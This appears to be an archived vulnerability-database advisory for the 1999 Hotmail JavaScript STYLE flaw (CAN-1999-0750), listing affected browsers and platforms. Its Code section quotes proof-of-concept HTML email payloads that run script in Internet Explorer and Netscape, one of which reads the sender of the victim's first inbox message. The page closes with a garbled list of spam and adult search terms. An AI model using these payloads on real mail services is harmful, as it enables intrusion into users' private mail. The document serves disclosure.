exploits , vulnerabilities , articles , Hotmail Javascript STYLE Vulnerability
| Title |
Hotmail Javascript STYLE Vulnerability |
| Published |
1999-09-13-12:00AM |
| Updated |
1999-09-13-12:00AM |
| Class |
Input Validation Error |
| CVE |
CAN-1999-0750 |
| Remote |
Yes |
| Local |
Unknown |
| Credit |
This vulnerability was posted to Bugtraq by Georgi Guninski <joro@nat.bg> |
| Vulnerable |
Netscape Communicator 4.6
Caldera OpenLinux Desktop 2.3
Caldera OpenLinux eBuilder 3.0
Conectiva Linux 4.1
Conectiva Linux 4.2
Conectiva Linux 5.0
Conectiva Linux 5.1
Microsoft Windows 2000 Professional
Microsoft Windows 95
Microsoft Windows 98
Microsoft Windows NT 4.0
RedHat Linux 5.2 alpha
RedHat Linux 5.2 i386
RedHat Linux 5.2 sparc
RedHat Linux 6.0
RedHat Linux 6.0 alpha
RedHat Linux 6.0 sparc
RedHat Linux 6.1 alpha
RedHat Linux 6.1 i386
RedHat Linux 6.1 sparc
RedHat Linux 6.2 alpha
RedHat Linux 6.2 i386
RedHat Linux 6.2 sparc
S.u.S.E. Linux 7.0
SCO eDesktop 2.4
SCO eServer 2.3
Netscape Communicator 4.5
Caldera OpenLinux Desktop 2.3
Caldera OpenLinux eBuilder 3.0
Conectiva Linux 3.0
Conectiva Linux 4.0
Conectiva Linux 4.1
Conectiva Linux 4.2
Conectiva Linux 5.0
Conectiva Linux 5.1
MandrakeSoft Linux Mandrake 6.0
MandrakeSoft Linux Mandrake 6.1
MandrakeSoft Linux Mandrake 7.0
MandrakeSoft Linux Mandrake 7.1
Microsoft Windows 2000 Professional
Microsoft Windows 95
Microsoft Windows 98
Microsoft Windows NT 4.0
RedHat Linux 5.2 alpha
RedHat Linux 5.2 i386
RedHat Linux 5.2 sparc
RedHat Linux 6.0
RedHat Linux 6.0 alpha
RedHat Linux 6.0 sparc
RedHat Linux 6.1 alpha
RedHat Linux 6.1 i386
RedHat Linux 6.1 sparc
RedHat Linux 6.2 alpha
RedHat Linux 6.2 i386
RedHat Linux 6.2 sparc
S.u.S.E. Linux 7.0
SCO eDesktop 2.4
SCO eServer 2.3
Netscape Communicator 4.0
Caldera OpenLinux Desktop 2.3
Caldera OpenLinux eBuilder 3.0
Conectiva Linux 3.0
Conectiva Linux 4.0
Conectiva Linux 4.1
Conectiva Linux 4.2
Conectiva Linux 5.0
Conectiva Linux 5.1
MandrakeSoft Linux Mandrake 6.0
MandrakeSoft Linux Mandrake 6.1
MandrakeSoft Linux Mandrake 7.0
MandrakeSoft Linux Mandrake 7.1
Microsoft Windows 2000 Professional
Microsoft Windows 95
Microsoft Windows 98
Microsoft Windows NT 4.0
RedHat Linux 5.2 alpha
RedHat Linux 5.2 i386
RedHat Linux 5.2 sparc
RedHat Linux 6.0
RedHat Linux 6.0 alpha
RedHat Linux 6.0 sparc
RedHat Linux 6.1 alpha
RedHat Linux 6.1 i386
RedHat Linux 6.1 sparc
RedHat Linux 6.2 alpha
RedHat Linux 6.2 i386
RedHat Linux 6.2 sparc
S.u.S.E. Linux 7.0
SCO eDesktop 2.4
SCO eServer 2.3
Microsoft Internet Explorer 5.0 for Windows NT 4.0
Microsoft Windows NT 4.0
Microsoft Internet Explorer 5.0 for Windows 98
Microsoft Windows 98
Microsoft Internet Explorer 5.0 for Windows 95
Microsoft Windows 95
Microsoft Internet Explorer 5.0 for Windows 2000
Microsoft Windows 2000 Professional
Microsoft Hotmail |
| Not Vulnerable |
|
| Code |
From Georgi Guninski's <joro@nat.bg> post to Bugtraq:
The code that must be embeded in a HTML email message is:
For IE 5.0:
<P STYLE="left:expression(eval('alert('JavaScript is
executed');window.close()'))" >
For Netscape Communicator:
<STYLE TYPE="text/javascript">
alert('JavaScript is executed');
a=window.open(document.links[2]);
setTimeout('alert('The first message in your Inbox is from:
'+a.document.links[26].text)',20000);
</STYLE>
|
| TXT |
 |
|
Advertising
|
|
Copyright 2007,
SecurityDot
Thu, 17 Dec 2009 06:55:04 +0000
Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS
EXPLOITS
VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
poll_cooki smp www.lovexy Www.Trisha www.mqdm.n TABOOINDIA Z123 sapna Woltlab Koriyan se www.mqdm.n Gallery 1. www.free-z Htt/ indos Shreya GHL www.zhibei Mod_DAV LO Gallery 1. myspcae+cl Gallery 1. MONA bindshell filem sex gallery/ma www.pinkwo vijay film Www.juliap www.vip805 sexoic Crack+Data www.quangu news for C Freesexydo Thwboard Gambar gad tamilsex t localhost inurl:?url Jilbab+Nak 7,o www.i608.c /search/ex Www.juliap bbw porn Urbanchatc www.797800 AL ALA kamapisach www.csdytd Immage
|
